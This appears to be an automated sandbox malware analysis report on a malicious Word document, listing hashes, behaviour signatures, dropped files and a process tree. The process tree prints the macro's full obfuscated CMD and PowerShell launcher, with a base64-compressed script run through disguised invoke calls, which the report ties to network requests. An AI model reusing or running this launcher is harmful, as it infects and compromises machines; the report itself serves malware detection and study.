Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 18:52

General

  • Target

    4293980a40e32263689adc31d09586ba_JaffaCakes118.doc

  • Size

    67KB

  • MD5

    4293980a40e32263689adc31d09586ba

  • SHA1

    0410bb681609ba26a916cf924cd5ec9f952d7ddb

  • SHA256

    7a7a96dea01318105b9ca22bb0e951f9475c1d0573fcbeabc33e10fd1ab56c41

  • SHA512

    0e0deeb21e3b5b60fbaa8f62b0a054e1de90f9f8f806b7fcf77e688c23830e0f19fe743b5db81bdb875afd78d7d5bcfe5607d67aebc547ee8193f1cfc980445c

  • SSDEEP

    768:Q/ZVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9KPVORZ1u2O7VQnoL:EZocn1kp59gxBK85fBt+a9KMRvi

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4293980a40e32263689adc31d09586ba_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:804
      • C:\Windows\SysWOW64\CMD.exe
        CMD C:\WINDowS\systEm32\CMD.exE /C "set kidZ= . ( $sHellid[1]+$SHELlID[13]+'X')(new-oBject sySTEM.IO.comPRESSiON.deFLatesTreaM( [IO.MeMOrYStReAM][CONVERT]::fRoMbASE64stRINg('NZBBawIxEIX/yh4CUazJzWrDgqViEVEPFraFXrJxiqnZSZqdNWvF/95V6vV9bz6Yx5azTY6Qhr78BkPZGkgUUL44C0iKbdfPOd8ThScpbWiM07XxzqKuhfGVHLej7bxNj9P/Sh2aGKKv/I2WE/hYFKs7TCmJGkwE0tFqaAmwth5FgyRg1wgdZQpD47EDJMvl/Y7AuRPp3UELBJJJb/Tb7PdOwflK1I08crENzlKPT3lfsR8sszzjo/GEK/b6XuQM8PhEUIUB/+SDKx9wAS1w9eUjaLPvsaJZZRaz69P9M8XTmXXjiJlP6Lzeza2DW+chuwr7aoFHf4DhopPeElV2noO6GE1mf75c/gA='), [syStEM.io.cOmprEsSIoN.compRESsiONMODe]::dECOMpREsS ) ^|% {new-oBject iO.STrEamREADEr($_,[sYStEM.TexT.eNCoDinG]::AsCII)}).ReaDTOENd( ) && powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      1f9e1b6e7cede3bb133c4cb5434ae581

      SHA1

      c675845ffc1ad7d27c5d17f1fc412f8d79f13891

      SHA256

      d510b3bf907b74eee22b9091abc8f2212351b9a341c8932131f28eedc131c1ac

      SHA512

      8437d41d98a5083fae2dc6fbf0d35439bba6d3c5ee0c73f02f43d7951dcf745369760dc89d075e817076dd11ed088c6733f84bea36fd36781679361a813dd213

    • C:\Users\Admin\AppData\Local\Temp\Cab40E9.tmp

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\Tar4149.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      68c05d4bd2ee9b69fe478c3bca57984c

      SHA1

      66907b649d8f5df70d868809108573d0849205d5

      SHA256

      eb7f1cfd0794dbca7f624aa2def8776642b5dbbc931b7e399ef16e7843e6c413

      SHA512

      38374734914974110eeeef34268203904cd82b5aa708f8d091ca9a814ccbebf1c20b31688077023977703a816e9a7c5c6a8747dc94304612c280a5d16ecf3a30

    • memory/1936-6-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/1936-7-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/1936-8-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/1936-0-0x000000002FF11000-0x000000002FF12000-memory.dmp

      Filesize

      4KB

    • memory/1936-2-0x000000007132D000-0x0000000071338000-memory.dmp

      Filesize

      44KB

    • memory/1936-83-0x000000007132D000-0x0000000071338000-memory.dmp

      Filesize

      44KB

    • memory/1936-84-0x0000000000420000-0x0000000000520000-memory.dmp

      Filesize

      1024KB

    • memory/1936-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1936-99-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1936-100-0x000000007132D000-0x0000000071338000-memory.dmp

      Filesize

      44KB